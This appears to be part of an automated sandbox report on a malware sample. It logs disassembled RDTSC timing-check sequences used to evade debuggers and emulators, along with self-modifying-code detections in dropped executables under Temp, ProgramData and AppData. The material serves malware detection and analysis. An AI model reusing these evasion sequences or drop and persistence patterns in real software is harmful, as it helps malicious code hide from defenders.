                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552040F second address: 552046A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 pushfd 0x00000007 jmp 00007F1228D24AC3h 0x0000000c sub esi, 19BE9A9Eh 0x00000012 jmp 00007F1228D24AC9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b and dword ptr [eax+04h], 00000000h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 call 00007F1228D24AC3h 0x00000027 pop eax 0x00000028 mov esi, edx 0x0000002a popad 0x0000002b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5500554 second address: 5500559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55201F2 second address: 552022F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24AC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F1228D24ABEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1228D24ABEh 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552022F second address: 5520270 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F122870CBD6h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F122870CBD7h 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5520270 second address: 552027F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 push edx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55407B1 second address: 55407B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55407B6 second address: 5540835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1228D24ABDh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], ebp 0x0000000f pushad 0x00000010 mov esi, 3F236E63h 0x00000015 pushfd 0x00000016 jmp 00007F1228D24AC8h 0x0000001b jmp 00007F1228D24AC5h 0x00000020 popfd 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 jmp 00007F1228D24ABEh 0x00000029 xchg eax, ecx 0x0000002a jmp 00007F1228D24AC0h 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F1228D24ABEh 0x00000037 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5540835 second address: 554085B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F122870CBD1h 0x00000008 mov dx, si 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov bx, 65BAh 0x00000016 movsx edx, si 0x00000019 popad 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 554085B second address: 5540908 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1228D24AC3h 0x00000008 mov edi, esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [76FA65FCh] 0x00000012 pushad 0x00000013 mov dl, ah 0x00000015 jmp 00007F1228D24ABDh 0x0000001a popad 0x0000001b test eax, eax 0x0000001d jmp 00007F1228D24ABEh 0x00000022 je 00007F129A707B80h 0x00000028 pushad 0x00000029 mov dx, ax 0x0000002c mov dl, al 0x0000002e popad 0x0000002f mov ecx, eax 0x00000031 pushad 0x00000032 push edi 0x00000033 mov bl, cl 0x00000035 pop edi 0x00000036 pushfd 0x00000037 jmp 00007F1228D24AC8h 0x0000003c and ecx, 7598BE18h 0x00000042 jmp 00007F1228D24ABBh 0x00000047 popfd 0x00000048 popad 0x00000049 xor eax, dword ptr [ebp+08h] 0x0000004c jmp 00007F1228D24ABFh 0x00000051 and ecx, 1Fh 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F1228D24AC5h 0x0000005b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5540908 second address: 5540918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F122870CBCCh 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5540918 second address: 554091C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 554091C second address: 5540985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ror eax, cl 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e call 00007F122870CBD9h 0x00000013 pop esi 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007F122870CBD7h 0x0000001b mov ax, CA5Fh 0x0000001f popad 0x00000020 popad 0x00000021 leave 0x00000022 jmp 00007F122870CBD2h 0x00000027 retn 0004h 0x0000002a nop 0x0000002b mov esi, eax 0x0000002d lea eax, dword ptr [ebp-08h] 0x00000030 xor esi, dword ptr [00BA2014h] 0x00000036 push eax 0x00000037 push eax 0x00000038 push eax 0x00000039 lea eax, dword ptr [ebp-10h] 0x0000003c push eax 0x0000003d call 00007F122D0EDC9Fh 0x00000042 push FFFFFFFEh 0x00000044 pushad 0x00000045 mov cl, 74h 0x00000047 push eax 0x00000048 push edx 0x00000049 mov ebx, 34F2910Ch 0x0000004e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5540985 second address: 55409D2 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1228D24AC5h 0x00000008 sbb ax, 67E6h 0x0000000d jmp 00007F1228D24AC1h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jmp 00007F1228D24AC3h 0x0000001f movzx ecx, dx 0x00000022 popad 0x00000023 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55409D2 second address: 5540A1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ret 0x0000000a nop 0x0000000b push eax 0x0000000c call 00007F122D0EDD08h 0x00000011 mov edi, edi 0x00000013 jmp 00007F122870CBD0h 0x00000018 xchg eax, ebp 0x00000019 jmp 00007F122870CBD0h 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F122870CBCDh 0x00000028 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5540A1E second address: 5540A24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5540A24 second address: 5540A2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5540A2A second address: 5540A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F003A second address: 54F004D instructions: 0x00000000 rdtsc 0x00000002 mov eax, edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bx, 06E6h 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 movsx edx, si 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F004D second address: 54F00BB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1228D24AC2h 0x00000008 or esi, 01510288h 0x0000000e jmp 00007F1228D24ABBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007F1228D24AC8h 0x0000001c sub si, 64E8h 0x00000021 jmp 00007F1228D24ABBh 0x00000026 popfd 0x00000027 popad 0x00000028 and esp, FFFFFFF8h 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F1228D24AC5h 0x00000032 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F00BB second address: 54F00D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b movzx ecx, di 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F00D8 second address: 54F0100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dl, 39h 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F1228D24AC7h 0x0000000e xchg eax, ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov ax, DFA1h 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0100 second address: 54F0120 instructions: 0x00000000 rdtsc 0x00000002 mov dh, cl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edi, 6283779Eh 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F122870CBD1h 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0120 second address: 54F0126 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0126 second address: 54F0149 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b jmp 00007F122870CBCFh 0x00000010 mov ebx, dword ptr [ebp+10h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0149 second address: 54F014D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F014D second address: 54F0168 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0168 second address: 54F016E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F016E second address: 54F0172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0172 second address: 54F0190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1228D24AC3h 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0190 second address: 54F01E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F122870CBCFh 0x00000008 mov dx, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], esi 0x00000011 pushad 0x00000012 mov cx, B9F7h 0x00000016 mov si, FE93h 0x0000001a popad 0x0000001b mov esi, dword ptr [ebp+08h] 0x0000001e jmp 00007F122870CBD6h 0x00000023 xchg eax, edi 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F122870CBD7h 0x0000002b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F01E8 second address: 54F01EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F01EE second address: 54F021A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F122870CBCCh 0x00000010 sbb eax, 2BB80CA8h 0x00000016 jmp 00007F122870CBCBh 0x0000001b popfd 0x0000001c push esi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F021A second address: 54F0275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 xchg eax, edi 0x00000007 pushad 0x00000008 mov bx, ax 0x0000000b mov si, 8369h 0x0000000f popad 0x00000010 test esi, esi 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F1228D24AC2h 0x00000019 jmp 00007F1228D24AC5h 0x0000001e popfd 0x0000001f pushad 0x00000020 mov edx, ecx 0x00000022 push esi 0x00000023 pop ebx 0x00000024 popad 0x00000025 popad 0x00000026 je 00007F129A752E6Eh 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F1228D24ABEh 0x00000035 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0275 second address: 54F0284 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0284 second address: 54F029C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1228D24AC4h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F029C second address: 54F02B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F02B1 second address: 54F02B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F02B5 second address: 54F02CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F02CD second address: 54F02D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F02D3 second address: 54F02D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F02D7 second address: 54F034D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F129A752E02h 0x0000000e jmp 00007F1228D24AC9h 0x00000013 mov edx, dword ptr [esi+44h] 0x00000016 pushad 0x00000017 push esi 0x00000018 call 00007F1228D24AC3h 0x0000001d pop eax 0x0000001e pop edi 0x0000001f mov ebx, eax 0x00000021 popad 0x00000022 or edx, dword ptr [ebp+0Ch] 0x00000025 jmp 00007F1228D24AC0h 0x0000002a test edx, 61000000h 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F1228D24AC7h 0x00000037 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F034D second address: 54F03C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F129A13AEE4h 0x0000000f jmp 00007F122870CBCEh 0x00000014 test byte ptr [esi+48h], 00000001h 0x00000018 jmp 00007F122870CBD0h 0x0000001d jne 00007F129A13AED5h 0x00000023 jmp 00007F122870CBD0h 0x00000028 test bl, 00000007h 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F122870CBD7h 0x00000032 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E078D second address: 54E07CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1228D24AC1h 0x00000009 sub esi, 188FC996h 0x0000000f jmp 00007F1228D24AC1h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F1228D24ABDh 0x00000020 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E07CD second address: 54E07D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E07D2 second address: 54E080D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, di 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F1228D24AC6h 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1228D24AC7h 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E080D second address: 54E0845 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007F122870CBD3h 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0845 second address: 54E084A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E084A second address: 54E08DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F122870CBCEh 0x00000013 or ecx, 68A58268h 0x00000019 jmp 00007F122870CBCBh 0x0000001e popfd 0x0000001f movzx ecx, bx 0x00000022 popad 0x00000023 push edx 0x00000024 pushad 0x00000025 jmp 00007F122870CBCEh 0x0000002a mov esi, 45333961h 0x0000002f popad 0x00000030 mov dword ptr [esp], ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007F122870CBD9h 0x0000003c add eax, 3AA165E6h 0x00000042 jmp 00007F122870CBD1h 0x00000047 popfd 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E08DB second address: 54E08E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E08E0 second address: 54E08EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F122870CBCAh 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E08EE second address: 54E093D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov edi, ecx 0x0000000c pushfd 0x0000000d jmp 00007F1228D24AC6h 0x00000012 add si, EBE8h 0x00000017 jmp 00007F1228D24ABBh 0x0000001c popfd 0x0000001d popad 0x0000001e mov dword ptr [esp], esi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F1228D24AC5h 0x00000028 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E093D second address: 54E094D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F122870CBCCh 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E094D second address: 54E0951 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0951 second address: 54E0968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F122870CBCAh 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0968 second address: 54E097E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24ABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E097E second address: 54E0982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0982 second address: 54E0A31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushfd 0x00000008 jmp 00007F1228D24ABAh 0x0000000d and ecx, 768DB308h 0x00000013 jmp 00007F1228D24ABBh 0x00000018 popfd 0x00000019 pop esi 0x0000001a popad 0x0000001b test esi, esi 0x0000001d jmp 00007F1228D24ABFh 0x00000022 je 00007F129A75A48Bh 0x00000028 jmp 00007F1228D24AC6h 0x0000002d cmp dword ptr [esi+08h], DDEEDDEEh 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007F1228D24ABEh 0x0000003b adc ax, A7C8h 0x00000040 jmp 00007F1228D24ABBh 0x00000045 popfd 0x00000046 call 00007F1228D24AC8h 0x0000004b jmp 00007F1228D24AC2h 0x00000050 pop ecx 0x00000051 popad 0x00000052 mov ecx, esi 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0A31 second address: 54E0A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0A35 second address: 54E0A39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0A39 second address: 54E0A3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0A3F second address: 54E0A45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0A45 second address: 54E0A49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0A49 second address: 54E0A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F129A75A408h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0A5C second address: 54E0A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, ecx 0x00000006 popad 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0A63 second address: 54E0ABC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24AC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [76FA6968h], 00000002h 0x00000010 pushad 0x00000011 mov edx, esi 0x00000013 mov edi, eax 0x00000015 popad 0x00000016 jne 00007F129A75A3E1h 0x0000001c pushad 0x0000001d mov ah, 25h 0x0000001f mov ax, bx 0x00000022 popad 0x00000023 mov edx, dword ptr [ebp+0Ch] 0x00000026 pushad 0x00000027 mov ax, bx 0x0000002a mov esi, edi 0x0000002c popad 0x0000002d push ebx 0x0000002e jmp 00007F1228D24AC0h 0x00000033 mov dword ptr [esp], ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0ABC second address: 54E0AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0AC0 second address: 54E0ADD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24AC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Tries to evade debugger and weak emulator (self modifying code)
                                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BACABB instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSpecial instruction interceptor: First address: 5FCABB instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSpecial instruction interceptor: First address: 90798C instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSpecial instruction interceptor: First address: AD4CBF instructions caused by: Self-modifying code
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: 107798C instructions caused by: Self-modifying code
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: 1244CBF instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeSpecial instruction interceptor: First address: 8CB7A7 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeSpecial instruction interceptor: First address: 8CB895 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeSpecial instruction interceptor: First address: A90C4F instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeSpecial instruction interceptor: First address: 8CB794 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: EE798C instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: 10B4CBF instructions caused by: Self-modifying code
